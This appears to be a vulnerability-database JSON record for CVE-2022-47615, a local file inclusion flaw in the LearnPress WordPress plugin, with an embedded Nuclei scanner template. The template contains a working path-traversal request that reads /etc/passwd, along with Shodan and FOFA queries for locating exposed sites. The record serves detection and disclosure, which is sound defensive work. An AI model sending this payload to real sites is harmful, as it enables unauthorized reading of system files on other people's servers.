{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-47615/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-47615/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-47615/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-47615/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-47615/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-47615"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-47615"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-47615.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2022-47615\n\ninfo:\n  name: LearnPress Plugin < 4.2.0 - Local File Inclusion\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure.\n  remediation: |\n    Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability.\n  reference:\n    - https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-47615\n    - https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve\n    - https://github.com/RandomRobbieBF/CVE-2022-47615\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-47615\n    cwe-id: CWE-434\n    epss-score: 0.05063\n    epss-percentile: 0.91995\n    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: thimpress\n    product: learnpress\n    framework: wordpress\n    shodan-query: http.html:/wp-content/plugins/learnpress\n    fofa-query: body=/wp-content/plugins/learnpress\n    publicwww-query: \"/wp-content/plugins/learnpress\"\n  tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: word\n        part: body\n        words:\n          - '\"status\":'\n          - '\"pagination\":'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a004830460221008661ac28365fd275d95810e8788cdf9e182e051637b7933c95ff10c09e7a057b022100f5080b613554c119cde226d3e9a9a27a8d71e222fe20c697fbc579255398ee92:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-47615"
}